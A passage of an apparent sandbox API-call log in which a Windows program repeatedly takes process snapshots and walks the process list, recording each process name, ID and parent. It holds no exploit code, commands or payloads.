(in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0136.546] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.547] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0136.548] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0136.549] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0136.550] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0136.551] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0136.553] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0136.554] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0136.555] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0136.661] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0136.662] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0136.663] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0136.664] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0136.666] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0136.667] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0136.668] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0136.669] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0136.670] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0136.671] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0136.672] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0136.673] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0136.675] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0136.676] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.677] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0136.678] CloseHandle (hObject=0xc4) returned 1 [0136.678] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0136.683] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0136.684] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0136.684] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0136.685] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, 
dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0136.686] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0136.686] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0136.687] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0136.687] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0136.688] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0136.689] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0136.690] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0136.691] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.692] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.692] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.693] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2a, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.694] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0136.695] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.696] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0136.721] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0136.722] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.723] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0136.725] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0136.733] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0136.738] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0136.739] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0136.740] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0136.741] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0136.742] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0136.743] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0136.744] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0136.746] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0136.747] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0136.748] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0136.749] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0136.750] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0136.751] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0136.753] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0136.754] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0136.755] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0136.756] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0136.757] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0136.758] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0136.760] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0136.761] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0136.762] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0136.769] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0136.771] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.772] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0136.773] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0136.779] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0136.780] CloseHandle (hObject=0xbc) returned 1 [0136.780] Sleep (dwMilliseconds=0x12c) [0137.130] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0137.136] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0137.137] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="System")) returned 1 [0137.137] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0137.138] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0137.138] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0137.139] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0137.140] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, 